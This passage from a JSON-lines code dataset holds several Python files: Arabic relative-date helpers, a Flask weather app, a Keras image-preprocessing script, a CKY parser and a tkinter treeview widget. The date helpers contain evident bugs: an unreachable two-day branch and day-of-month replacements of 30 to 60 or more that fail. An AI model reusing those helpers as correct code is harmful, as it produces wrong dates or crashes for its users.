"line_number": 71, "usage_type": "call"}, {"api_name": "webparser.parser.has_rss_feed", "line_number": 72, "usage_type": "call"}]}
+{"seq_id": "1982601263", "text": "from datetime import timedelta, datetime\n\n\ndef clean_day(days_as_text: str):\n if \"يوم\" in days_as_text:\n today = datetime.today()\n last_day = today - timedelta(days=1)\n return last_day.strftime(\"%Y-%m-%d\")\n\n if \"يومين\" in days_as_text:\n today = datetime.today()\n last_2_days = today - timedelta(days=1)\n return last_2_days.strftime(\"%Y-%m-%d\")\n\n if \"ايام\" in days_as_text:\n number_of_days = [int(number) for number in days_as_text if number.isdigit()]\n today = datetime.today()\n last_n_days = today - timedelta(days=number_of_days[0])\n return last_n_days.strftime(\"%Y-%m-%d\")\n\n return \"unknown day\"\n\n\ndef clean_week(weeks_as_text: str):\n\n if \"اسبوع\" in weeks_as_text:\n today = datetime.today()\n last_week = today - timedelta(days=7)\n return last_week.strftime(\"%Y-%m-%d\")\n\n if \"اسبوعين\" in weeks_as_text:\n today = datetime.today()\n last_2_weeks = today - timedelta(days=14)\n return last_2_weeks.strftime(\"%Y-%m-%d\")\n\n if \"اسابيع\" in weeks_as_text:\n number_of_weeks = [int(number) for number in weeks_as_text if number.isdigit()]\n today = datetime.today()\n last_n_weeks = today - timedelta(days=number_of_weeks[0] * 7)\n return last_n_weeks.strftime(\"%Y-%m-%d\")\n\n return \"unknown week\"\n\n\ndef clean_month(months_as_text: str):\n if \"شهر\" in months_as_text:\n today = datetime.today()\n first = today.replace(day=30)\n last_month = first - timedelta(days=1)\n return last_month.strftime(\"%Y-%m-%d\")\n\n if \"شهرين\" in months_as_text:\n today = datetime.today()\n first = today.replace(day=60)\n last_2_month = first - timedelta(days=1)\n return last_2_month.strftime(\"%Y-%m-%d\")\n\n if \"شهور\" in months_as_text:\n number_of_months = [\n int(number) for number in months_as_text if number.isdigit()\n ]\n today = datetime.today()\n first = today.replace(day=number_of_months[0] * 30)\n last_n_month = first - timedelta(days=1)\n return last_n_month.strftime(\"%Y-%m-%d\")\n\n return \"unknown month\"\n", "repo_name": "NafieAlhilaly/aqar-scraper", "sub_path": "app/helpers/date_helpers.py", "file_name": "date_helpers.py", "file_ext": "py", "file_size_in_byte": 2196, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.today", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 6, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 7, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 11, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 11, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 17, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 17, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 27, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 32, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 38, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 38, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 47, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 53, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 53, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 55, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 62, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 62, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 64, "usage_type": "call"}]}
+{"seq_id": "5920581031", "text": "\nimport logging\n\nfrom functions.format_weather import *\nfrom flask import Flask, request, render_template\n\nlogging.basicConfig(filename=\"Basic.log\")\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef search_weather():\n return render_template(\"form.html\")\n\n\n@app.route('/search/', methods=['POST'])\ndef weather():\n try:\n s = request.values[\"s\"]\n weather = format_weather(get_weather(get_coordinates(s)))\n return render_template(\"weather.html\", weather=weather)\n except Exception:\n return \"Sorry, page not found 404 ;(\"\n\n\nif __name__ == '__main__':\n app.run()\n", "repo_name": "SergeyCicada/TypedWeather", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 592, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 22, "usage_type": "call"}]}
+{"seq_id": "21350445198", "text": "import os\nfrom keras.preprocessing import image as image_utils\nfrom PIL import Image\nfrom PIL import ImageFilter\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\n\ninp_dir = '/home/margs/Drug dicovery and machine learning/Images_zinc/Train'\ntarget_size = (300, 300)\n\nclasses = os.listdir(inp_dir)\nall_images = []\nall_labels = []\n\ni = 0\nfor idx, c in enumerate(classes):\n img_list = os.listdir(inp_dir + '/' + '12170(80%)')\n print(idx)\n j = 0\n for img in img_list:\n fname = inp_dir + '/' + '12170(80%)' + '/' + img\n image = image_utils.load_img(fname).resize(target_size,Image.ANTIALIAS)\n image = np.array(image.getdata()).reshape(target_size[0], target_size[1], 3)\n image = image.astype('float32')/255\n all_images.append(image)\n all_labels.append(idx)\n #j += 1\n #if j >= 20:\n # break\n #plt.imshow(image)\n #plt.show()\n #i += 1\n #if i >= 50:\n # break\n\n\nall_images = np.array(all_images)\nall_labels = np.array(all_labels)\n\nprint(all_images.shape)\nprint(all_labels.shape)\n\nnp.save('full_x', all_images)\nnp.save('full_y', all_labels)\n\n\n'''\nIGNORE THIS!! THIS IS THE CODE FOR THE MODEL. IT'S NOW AVAILABLE IN keras_VAE.py\nx = Input(shape=original_img_size)\nconv_1 = Conv2D(img_chns,\n kernel_size=(2, 2),\n padding='same', activation='relu')(x)\nconv_2 = Conv2D(filters,\n kernel_size=(2, 2),\n padding='same', activation='relu',\n strides=(2, 2))(conv_1)\nconv_3 = Conv2D(filters,\n kernel_size=num_conv,\n padding='same', activation='relu',\n strides=1)(conv_2)\nconv_4 = Conv2D(filters,\n kernel_size=num_conv,\n padding='same', activation='relu',\n strides=1)(conv_3)\nflat = Flatten()(conv_4)\nhidden = Dense(intermediate_dim, activation='relu')(flat)\n\n# defined as separate layers because they will be reused later\nz_mean = Dense(latent_dim)(hidden)\nz_log_var = Dense(latent_dim)(hidden)\n\ndef sampling(args):\n z_mean, z_log_var = args\n epsilon = K.random_normal(shape=(K.shape(z_mean)[0], latent_dim),\n mean=0., stddev=epsilon_std)\n return z_mean + K.exp(z_log_var) * epsilon\n\nz = Lambda(sampling, output_shape=(latent_dim,))([z_mean, z_log_var])\n\n# decoder network\ndecoder_hid = Dense(intermediate_dim, activation='relu')\ndecoder_upsample = Dense(filters * 150 * 150, activation='relu')\n\n#if K.image_data_format() == 'channels_first':\n# output_shape = (batch_size, filters, 150, 150)\n#else:\n# output_shape = (batch_size, 150, 150, filters)\n\noutput_shape = (batch_size, 150, 150, filters)\n\nprint('Output shape 1: ', output_shape)\n\ndecoder_reshape = Reshape(output_shape[1:])\ndecoder_deconv_1 = Conv2DTranspose(filters,\n kernel_size=num_conv,\n padding='same',\n strides=1,\n activation='relu')\ndecoder_deconv_2 = Conv2DTranspose(filters,\n kernel_size=num_conv,\n padding='same',\n strides=1,\n activation='relu')\n\n#if K.image_data_format() == 'channels_first':\n# output_shape = (batch_size, filters, 300, 300)\n#else:\n# output_shape = (batch_size, 300, 300, filters)\n\noutput_shape = (batch_size, 300, 300, filters)\n\nprint('Output shape 2: ', output_shape)\n\ndecoder_deconv_3_upsamp = Conv2DTranspose(filters,\n kernel_size=(3, 3),\n strides=(2, 2),\n padding='valid',\n activation='relu')\ndecoder_mean_squash = Conv2D(img_chns,\n kernel_size=2,\n padding='valid',\n activation='sigmoid')\n\nhid_decoded = decoder_hid(z)\nup_decoded = decoder_upsample(hid_decoded)\nreshape_decoded = decoder_reshape(up_decoded)\ndeconv_1_decoded = decoder_deconv_1(reshape_decoded)\ndeconv_2_decoded = decoder_deconv_2(deconv_1_decoded)\nx_decoded_relu = decoder_deconv_3_upsamp(deconv_2_decoded)\nx_decoded_mean_squash = decoder_mean_squash(x_decoded_relu)\n\n# Custom loss layer\nclass CustomVariationalLayer(Layer):\n def __init__(self, **kwargs):\n self.is_placeholder = True\n super(CustomVariationalLayer, self).__init__(**kwargs)\n\n def vae_loss(self, x, x_decoded_mean_squash):\n x = K.flatten(x)\n x_decoded_mean_squash = K.flatten(x_decoded_mean_squash)\n xent_loss = img_rows * img_cols * metrics.binary_crossentropy(x, x_decoded_mean_squash)\n kl_loss = - 0.5 * K.mean(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)\n return K.mean(xent_loss + kl_loss)\n\n def call(self, inputs):\n x = inputs[0]\n x_decoded_mean_squash = inputs[1]\n loss = self.vae_loss(x, x_decoded_mean_squash)\n self.add_loss(loss, inputs=inputs)\n return x\n\ny = CustomVariationalLayer()([x, x_decoded_mean_squash])\n\n# defining VAE model\nvae = Model(x, y)\n\n#def my_vae_loss(y_true, y_pred):\n# xent_loss = img_rows * img_cols * metrics.binary_crossentropy(K.flatten(y_true), K.flatten(y_pred))\n# kl_loss = - 0.5 * K.sum(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)\n# vae_loss = K.mean(xent_loss + kl_loss)\n# return vae_loss\n\nvae.compile(optimizer='rmsprop', loss=None, metrics=['accuracy'])\nvae.summary()\n#working code'''", "repo_name": "MargareV/VAE-for-de-novo-drug-design", "sub_path": "image_preprocess.py", "file_name": "image_preprocess.py", "file_ext": "py", "file_size_in_byte": 5620, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.listdir", "line_number": 12, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 18, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.load_img", "line_number": 23, "usage_type": "call"}, {"api_name": "keras.preprocessing.image", "line_number": 23, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 23, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 23, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 45, "usage_type": "call"}]}
+{"seq_id": "37181894170", "text": "from bigsky.cfg import Terminal, Nonterminal\nfrom sacremoses import MosesTokenizer\nfrom queue import Queue\nimport copy\nimport json\n\nSAFE = True\n\ndef can_be_nonterminal(nonterminal, nts):\n \"\"\"returns whether a given nonterminal is in a set of nonterminals\"\"\"\n ntl = list(nts)\n for ntt in ntl:\n if ntt[0] == nonterminal:\n return True\n return False\n\ndef cky_alg(words, grammar):\n \"\"\"Based on pseudocode in Jurafsky and Martin.\"\"\"\n \"\"\"Put this in its own function for modularity. Now I can use it to extract the tree(s)\"\"\"\n chart = [[set() for i in range(len(words) + 1)] # n+1 x n+1 matrix of sets\n for j in range(len(words) + 1)]\n for j in range(1, 1 + len(words)):\n rules = grammar.get_rules_with_rhs([Terminal(words[j-1])]) # rules that can make this word\n nts = set([(rule.lhs, -1) for rule in rules]) # set of possible pre-terminals\n chart[j-1][j] = chart[j-1][j] | nts # add that set to table\n for i in range(j-2, -1, -1): # go upwards from here\n for k in range(i+1, j): # and for all possible split points\n nt_pairs = [(x[0], y[0]) # make a list of all possible combinations of constituents\n for x in chart[i][k] # given the break point\n for y in chart[k][j]]\n for nt_pair in nt_pairs: # for each combo,\n rules = grammar.get_rules_with_rhs(nt_pair) # if there's a pair that produces something\n nts = set([(rule.lhs, k) for rule in rules]) # set of rules with their break-point\n chart[i][j] = chart[i][j] | nts # add it to the set of things this could be\n return chart\n\ndef cky_parse(sent, grammar):\n \"\"\"\n returns whether a sentence can be parsed with a given CFG\n (this was the original thing in here)\n \"\"\"\n words = MosesTokenizer().tokenize(sent)\n chart = cky_alg(words, grammar)\n return can_be_nonterminal(Nonterminal(\"S\"), # if I can make a sentence, return it\n chart[0][len(words)]) \n\ndef cky_tree(sent, grammar):\n \"\"\"Returns the parse tree(s) of a given sentence and CFG\"\"\"\n\n # is this exponential time? nobody likes that :(\n # determine whether it is, and if so, then try a bottom-up (rather than\n # top-down approach)\n def recursive_helper(target, i, j):\n \"\"\"Builds the tree that turns words i to j into a target nonterminal\"\"\"\n if j-i <= 1: # base case: looking at one word\n return (str(target),words[i])\n nts = list(chart[i][j])\n ans_trees = []\n rules = grammar.get_rules_with_lhs(target)\n for nt in nts: # for each nonterminal in this node\n if nt[0] == target: # if it's what I'm looking for\n for r in rules: # go through all the rules that can make the target\n if (can_be_nonterminal(r.rhs[0], chart[i][nt[1]]) and # and if I can make the constituents\n can_be_nonterminal(r.rhs[1], chart[nt[1]][j])):\n ans_trees.append((str(target), \n recursive_helper(r.rhs[0], i, nt[1]), # add the constituent trees to this list\n recursive_helper(r.rhs[1], nt[1],j))) # of possible trees\n return ans_trees\n\n words = MosesTokenizer().tokenize(sent)\n chart = cky_alg(words, grammar)\n if not can_be_nonterminal(Nonterminal(\"S\"), # first, make sure there _is_ a tree\n chart[0][len(words)]): \n return False\n trees = recursive_helper(Nonterminal(\"S\"), 0, len(words)) # treeificate with that function\n return trees\n \ndef enumerate_cky_trees(sent, grammar):\n trees = cky_tree(sent, grammar)\n if not trees:\n return []\n \n # and now I have a list of trees whose subtrees may include lists of subtrees\n # it would be nice if those were all separated - ie if there are 2 possible\n # parses of a given phrase, we then create two entire trees. I think this is going \n # to be a rather intensive process if we have really ambiguous sentences so I \n # have provided a turn-off flag (split_trees)\n def find_ambiguity(start):\n \"\"\"Searches for an ambiguity and returns a pointer to it\"\"\"\n if len(start) > 1 and type(start) == list: # If this list is long, found it\n return start\n if len(start[0]) <= 2: # If the next thing is a terminal, cant find\n return False\n return (find_ambiguity(start[0][1]) or # else, check the left and the right of my one thing\n find_ambiguity(start[0][2]))\n\n ans_trees = [] # list of unambiguous trees\n wq = Queue() # work queue\n wq.put(trees) # put ambiguous tree in it\n while not wq.empty(): # while there is something in the queue\n t = wq.get() # dequeue, t is pointer to head\n x = find_ambiguity(t) # find an ambiguity if there is one\n if not x: # if not, this tree is done\n ans_trees.append(t)\n else: # if yes, its TREE SPLITTIN' TIME!!\n n = len(x) # how many things am I gonna need to make?\n for i in range(n): # go through each option\n u = copy.deepcopy(t) # make a deep copy of t\n y = find_ambiguity(u) # since find_amb. is deterministic, y should point to the same place as x but in u\n for j in range(n)[::-1]: # get rid of the other options. I think just splicing would fail bc \n if j == i: continue # pointers so I'm using list method pop\n y.pop(j)\n wq.put(u) # then add this new tree with the removed ambiguity back onto the queue in case still ambig.\n return ans_trees # potentially needless worrying about duplicates\n\ndef debinarize(tree, grammar):\n '''takes the non-binarized form of the parsing grammar to make the tree a non-binary tree'''\n def only_real_rules(subtree):\n '''recursively gets rid of all nonterminals that dont exist in the original grammar'''\n if type(subtree) == str: # Base Case: strings are always leaves\n return [None, subtree]\n if type(subtree) == list: # at this point there should be no ambiguities so \n subtree = subtree[0] # these lists are pointless\n partial_result = None\n if len(grammar.get_rules_with_lhs(Nonterminal(subtree[0]))) > 0: # Is there a rule for this node in the grammar?\n partial_result = [subtree[0]] + [only_real_rules(subtree[i]) # if so, leave this and recurse downward\n for i in range(1, len(subtree))]\n else:\n partial_result = [None] + [only_real_rules(subtree[i]) # if not, label this NONE and recurse down\n for i in range(1, len(subtree))]\n result = [partial_result[0]] # stick the label on the front of this list\n for i in range(1, len(partial_result)): # for sub-results\n if partial_result[i][0] == None: # if the sub-result is a non-node\n result += partial_result[i][1:] # concatenate that list\n else:\n result.append(partial_result[i]) # otherwise, just add the REAL node\n return result\n\n def unaries(subtree):\n '''\n Recursively adds in unaries where they need to be\n\n I assumed that only one rule in the grammar will create a given string/phrase combo\n But I think I'm allowed to make that assumption. Especially since we control the CFG\n Then to do this we can easily backtrack. I DID provide error handling in case of this, \n in which case this algorithm will be broken and probably some kind of dynamic programming\n thing will have to be implemented.\n '''\n if type(subtree) == str: # Base case, strings are boring\n return subtree\n target = Nonterminal(subtree[0]) # save the target node\n rhs_rule = None\n rhs = [Terminal(w) if type(w)==str # figure out what a rule.rhs would look like\n else Nonterminal(w[0]) \n for w in subtree[1:]]\n target_rules = grammar.get_rules_with_lhs(target) # get all the rules that make the target\n try:\n rhs_rule = grammar.get_rules_with_rhs(rhs)[0] # get the rules that make the interior\n except:\n raise KeyError(\"No rule with \\\"\" + \"\".join(subtree[1:]) \n + \"\\\" as right-hand side\")\n subtree[0] = str(rhs_rule.lhs) # replace start node w what DOES make rhs\n result = [subtree[0]] + [unaries(p) for p in subtree[1:]] # recurse downward\n while rhs_rule not in target_rules: # while I am not making the target\n try:\n rhs_rule = grammar.get_rules_with_rhs((rhs_rule.lhs,))[0] # get the rules that make the new interior\n except: # (which is the thing that made the last interior)\n raise KeyError(\"No rule with \\\"\" + \"\".join(subtree[1:])\n + \"\\\" as right-hand side\")\n result = [str(rhs_rule.lhs), result] # step result up\n return result \n \n orr = only_real_rules(tree)\n try:\n return unaries(orr)\n except KeyError:\n print(\"Failed to remove unaries\")\n return orr\n\ndef reformat_tree(t):\n \"\"\"\n Reformats the output of the CKY parser for the following syntax tree viewer:\n \n http://ironcreek.net/syntaxtree/\n \n \"\"\"\n s = json.dumps(t)\n s = s.replace('\",\"', '###')\n s = s.replace('\"', '')\n s = s.replace(',','')\n s = s.replace('[[','[')\n s = s.replace(']]',']')\n s = s.replace('_','')\n s = s.replace('###', ',')\n return s \n\ndef make_trees(sentence, orig_grammar, cnf_grammar=None):\n \"\"\"\n Parses the sentence and returns a list of CKY trees, e.g:\n\n In : make_trees(\"clear tonight.\", grammar)\n Out: [['S', ['WEATHER', 'clear'], ['TIME', ['BTIME', 'tonight']], '.']]\n \n \"\"\"\n if cnf_grammar == None:\n cnf_grammar = orig_grammar.binarize()\n trees = enumerate_cky_trees(sentence, cnf_grammar)\n for i in range(len(trees)):\n trees[i] = debinarize(trees[i], orig_grammar)\n return trees\n", "repo_name": "Mark-Hopkins-at-Williams/bigsky", "sub_path": "bigsky/cky.py", "file_name": "cky.py", "file_ext": "py", "file_size_in_byte": 11774, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "bigsky.cfg.Terminal", "line_number": 23, "usage_type": "call"}, {"api_name": "sacremoses.MosesTokenizer", "line_number": 42, "usage_type": "call"}, {"api_name": "bigsky.cfg.Nonterminal", "line_number": 44, "usage_type": "call"}, {"api_name": "sacremoses.MosesTokenizer", "line_number": 70, "usage_type": "call"}, {"api_name": "bigsky.cfg.Nonterminal", "line_number": 72, "usage_type": "call"}, {"api_name": "bigsky.cfg.Nonterminal", "line_number": 75, "usage_type": "call"}, {"api_name": "queue.Queue", "line_number": 98, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 108, "usage_type": "call"}, {"api_name": "bigsky.cfg.Nonterminal", "line_number": 125, "usage_type": "call"}, {"api_name": "bigsky.cfg.Nonterminal", "line_number": 151, "usage_type": "call"}, {"api_name": "bigsky.cfg.Terminal", "line_number": 153, "usage_type": "call"}, {"api_name": "bigsky.cfg.Nonterminal", "line_number": 154, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 187, "usage_type": "call"}]}
+{"seq_id": "8282390225", "text": "import tkinter as tk\nimport tkinter.ttk as ttk\nimport uuid\nfrom customtkinter import *\nimport pollenisatorgui.core.components.utils as utils\nfrom pollenisatorgui.core.components.settings import Settings\nfrom pollenisatorgui.core.application.paginable import Paginable\nimport pyperclip\n\n\nclass ScrollableTreeview(Paginable):\n def __init__(self, root, columns, **kwargs):\n if not kwargs.get(\"paginate\", True):\n maxPerPage = -1\n else:\n maxPerPage = kwargs.get(\"maxPerPage\", 10)\n super().__init__(root, self.insert_items, self.empty_treeview, self.callback_get_value, lambda: 0, height=0, maxPerPage=maxPerPage)\n self.root = root\n self.columns = columns\n self._detached = set()\n self.sort_keys = kwargs.get(\"sort_keys\", None)\n self.content_view = self.getContentView()\n self.treevw = ttk.Treeview(self.content_view, style=kwargs.get(\"style\",None), height=kwargs.get(\"height\", 10))\n self.treevw['columns'] = columns\n settings = Settings()\n self.treevw.tag_configure(\"odd\", background=utils.getBackgroundSecondColor())\n lbl = CTkLabel(self)\n self.f = tk.font.Font(lbl, \"Sans\", bold=True, size=10)\n self.columnsLen = [self.f.measure(column) for column in self.columns]\n listOfLambdas = [self.column_clicked(\"#\"+str(i), False) for i in range(len(self.columns))]\n for h_i, header in enumerate(self.columns):\n self.treevw.heading(\"#\"+str(h_i), text=header, anchor=\"w\", command=listOfLambdas[h_i])\n self.treevw.column(\"#\"+str(h_i), anchor='w',\n stretch=tk.YES, minwidth=self.columnsLen[h_i]) # ,width=self.columnsLen[h_i]\n self.treevw.grid(row=0, column=0, sticky=tk.NSEW)\n for bindName, callback in kwargs.get(\"binds\", {}).items():\n self.treevw.bind(bindName, callback)\n scbVSel = CTkScrollbar(self.content_view,\n orientation=tk.VERTICAL,\n command=self.treevw.yview)\n scbHSel = CTkScrollbar(\n self.content_view, orientation=tk.HORIZONTAL, command=self.treevw.xview)\n self.treevw.configure(yscrollcommand=scbVSel.set)\n self.treevw.configure(xscrollcommand=scbHSel.set)\n scbVSel.grid(row=0, column=1, sticky=tk.NS)\n scbHSel.grid(row=1, column=0, sticky=tk.EW)\n self.setPaginationPanel()\n \n \n self.treevw.bind(\"\", self.copy)\n self.treevw.bind('', self.selectAll)\n self.treevw.bind(\"\", self.unselect)\n self._initContextualMenu(self.treevw)\n\n def empty_treeview(self):\n for item in self.treevw.get_children():\n self.treevw.delete(item)\n\n def unselect(self, event=None):\n for item in self.treevw.selection():\n self.treevw.selection_remove(item)\n \n def callback_get_value(self, item, column):\n if column == 0:\n return item[\"text\"]\n else:\n return item[\"values\"][column-1]\n\n def selectAll(self, event=None):\n self.treevw.selection_set(self.treevw.get_children())\n\n def bind(self, event_name, func):\n self.treevw.bind(event_name, func)\n\n def insert(self, parent, index, iid, text=\"\",values=(), tags=(), image=None):\n res = None\n if iid is None:\n iid = uuid.uuid4()\n if iid not in [x[\"iid\"] for x in self.infos]:\n res = self.addPaginatedInfo({\"parent\":parent,\"iid\":iid, \"index\":index, \"text\":text,\"values\":values,\"tags\":tags, \"image\":image})\n return res\n \n def insert_items(self, items):\n res = None\n for t in items:\n res = self._insert(t[\"parent\"], t[\"index\"], t[\"iid\"], t[\"text\"], t[\"values\"], t[\"tags\"], t[\"image\"])\n return res\n \n def _insert(self, parent, index, iid, text=\"\",values=(), tags=(), image=None):\n kwargs = {}\n if image is not None:\n kwargs[\"image\"] =image\n try:\n res = self.treevw.insert(parent, index, iid, text=text, values=values, tags=tags, **kwargs)\n except tk.TclError as e:\n return None\n self.columnsLen[0] = max(self.columnsLen[0], self.f.measure(text))\n self.treevw.column(\"#0\", anchor='w',\n stretch=tk.YES, minwidth=self.columnsLen[0], width=self.columnsLen[0])\n for i, val in enumerate(values):\n self.columnsLen[i+1] = min(1000, max(self.columnsLen[i+1], self.f.measure(str(val))))\n self.treevw.column(\"#\"+str(i+1), anchor='w',\n stretch=tk.YES, minwidth=self.columnsLen[i+1], width=self.columnsLen[i+1])\n self.resetOddTags()\n return res\n\n def item(self, iid, **kwargs):\n try:\n self.treevw.item(iid, **kwargs)\n except tk.TclError as e:\n pass\n try:\n self.infos[[str(x[\"iid\"]) for x in self.infos].index(iid)].update(kwargs)\n except ValueError as e:\n raise tk.TclError(e)\n return self.infos[[str(x[\"iid\"]) for x in self.infos].index(iid)]\n \n \n def _initContextualMenu(self, parent):\n \"\"\"Initialize the contextual menu for paperclip.\n Args:\n parent: the tkinter parent widget for the contextual menu\n \"\"\"\n self.contextualMenu = utils.craftMenuWithStyle(parent)\n parent.bind(\"\", self.popup)\n self.contextualMenu.add_command(label=\"Copy\", command=self.copy)\n self.contextualMenu.add_command(label=\"Close\", command=self.close)\n\n \n def addContextMenuCommand(self, label, command, replace=False):\n found = False\n for i in range(self.contextualMenu.index('end')+1):\n labelStr = str(self.contextualMenu.entrycget(i,'label') )\n if labelStr == label and not replace:\n found = True\n break\n if not found:\n self.contextualMenu.add_command(label=label, command=command)\n\n def close(self):\n \"\"\"Option of the contextual menu : Close the contextual menu by doing nothing\n \"\"\"\n pass\n\n def copy(self, _event=None):\n \"\"\"Option of the contextual menu : Copy entry text to clipboard\n \"\"\"\n selected = self.treevw.selection()\n texts = []\n for item in selected:\n it = self.item(item)\n texts.append(it.get(\"text\", \"\") + \" \" +\n \" \".join(map(str,it.get(\"values\", []))))\n\n pyperclip.copy(\"\\n\".join(texts))\n\n def popup(self, event):\n \"\"\"\n Fill the self.widgetMenuOpen and reraise the event in the editing window contextual menu\n\n Args:\n event: a ttk Treeview event autofilled.\n Contains information on what treeview node was clicked.\n \"\"\"\n self.widgetMenuOpen = event.widget\n self.contextualMenu.tk_popup(event.x_root, event.y_root)\n self.contextualMenu.focus_set()\n self.contextualMenu.bind('', self.popupFocusOut)\n\n def popupFocusOut(self, _event=None):\n \"\"\"Callback for focus out event. Destroy contextual menu\n Args:\n _event: not used but mandatory\n \"\"\"\n self.contextualMenu.unpost()\n\n \n\n \n\n def detach(self, item_id):\n try:\n self.treevw.detach(item_id)\n self._detached.add(item_id)\n except tk.TclError:\n pass\n\n def reattach(self, item_id, parent, index):\n try:\n self.treevw.reattach(item_id, parent, index)\n self._detached.discard(item_id)\n except tk.TclError:\n pass\n \n @classmethod\n def date_compare(cls, start, end, toCompare):\n dated = utils.stringToDate(start)\n datef = utils.stringToDate(end)\n toCompare = utils.stringToDate(toCompare)\n if dated is None or datef is None:\n return True\n return dated <= toCompare <= datef\n\n def column_clicked(self, col, reverse):\n \"\"\"A lambda to call the statusbarController.statusbarClicked with the tag name clicked\n Args:\n name: the tag name clicked\n \"\"\"\n return lambda : self.sort_column(self.treevw, col, reverse)\n\n def sort_column(self, tv, col, reverse):\n sort_key = None\n if self.sort_keys:\n sort_key = self.sort_keys[int(col[1:])]\n if sort_key is None:\n sort_key = str\n if col == \"#0\":\n self.infos.sort(key=lambda info: sort_key(info[\"text\"]), reverse=reverse)\n else:\n self.infos.sort(key=lambda info: sort_key(str(info[\"values\"][int(col[1:])-1])), reverse=reverse)\n tv.heading(col, command=self.column_clicked(col, not reverse))\n self.goToPage(\"first\", force=True)\n\n def reset(self):\n \"\"\"Reset the treeview values (delete all lines)\"\"\"\n for item in self.treevw.get_children():\n self.treevw.delete(item)\n self.infos = []\n self._detached = set()\n self.resetPagination()\n\n\n def resetOddTags(self):\n for i, child in enumerate(self.treevw.get_children()):\n odd_tag = (\"odd\") if i%2 != 0 else ()\n current_tags = self.item(child)[\"tags\"]\n current_tags = [current_tags] if isinstance(current_tags, str) else list(current_tags)\n if \"odd\" in current_tags:\n current_tags.remove(\"odd\")\n self.item(child, tags=[odd_tag]+current_tags)\n\n def delete(self, _event=None):\n \"\"\"Callback for event\n Remove the selected item in the treeview\n Args:\n _event: not used but mandatory\"\"\"\n for selected in self.treevw.selection():\n try:\n item = self.item(selected)\n if item[\"text\"].strip() != \"\":\n self.treevw.delete(selected)\n try:\n ind = [x[\"iid\"] for x in self.infos].index(selected)\n del self.infos[ind]\n except ValueError as e:\n pass\n except tk.TclError:\n pass\n self.resetOddTags()\n\n def selection(self):\n return self.treevw.selection()\n \n def get_children(self, all=False):\n if all:\n return [x[\"iid\"] for x in self.infos]\n return self.treevw.get_children()\n \n def identify(self, *args, **kwargs):\n return self.treevw.identify(*args, **kwargs)\n \n def identify_column(self, *args, **kwargs):\n return self.treevw.identify_column(*args, **kwargs)\n\n def parent(self, item):\n return self.treevw.parent(item)\n\n \n\n ", "repo_name": "fbarre96/PollenisatorGUI", "sub_path": "pollenisatorgui/core/application/scrollabletreeview.py", "file_name": "scrollabletreeview.py", "file_ext": "py", "file_size_in_byte": 10684, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pollenisatorgui.core.application.paginable.Paginable", "line_number": 11, "usage_type": "name"}, {"api_name": "tkinter.ttk.Treeview", "line_number": 23, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 23, "usage_type": "name"}, {"api_name": "pollenisatorgui.core.components.settings.Settings", "line_number": 25, "usage_type": "call"}, {"api_name": "pollenisatorgui.core.components.utils.getBackgroundSecondColor", "line_number": 26, "usage_type": "call"}, {"api_name": "pollenisatorgui.core.components.utils", "line_number": 26, "usage_type": "name"}, {"api_name": "tkinter.font.Font", "line_number": 28, 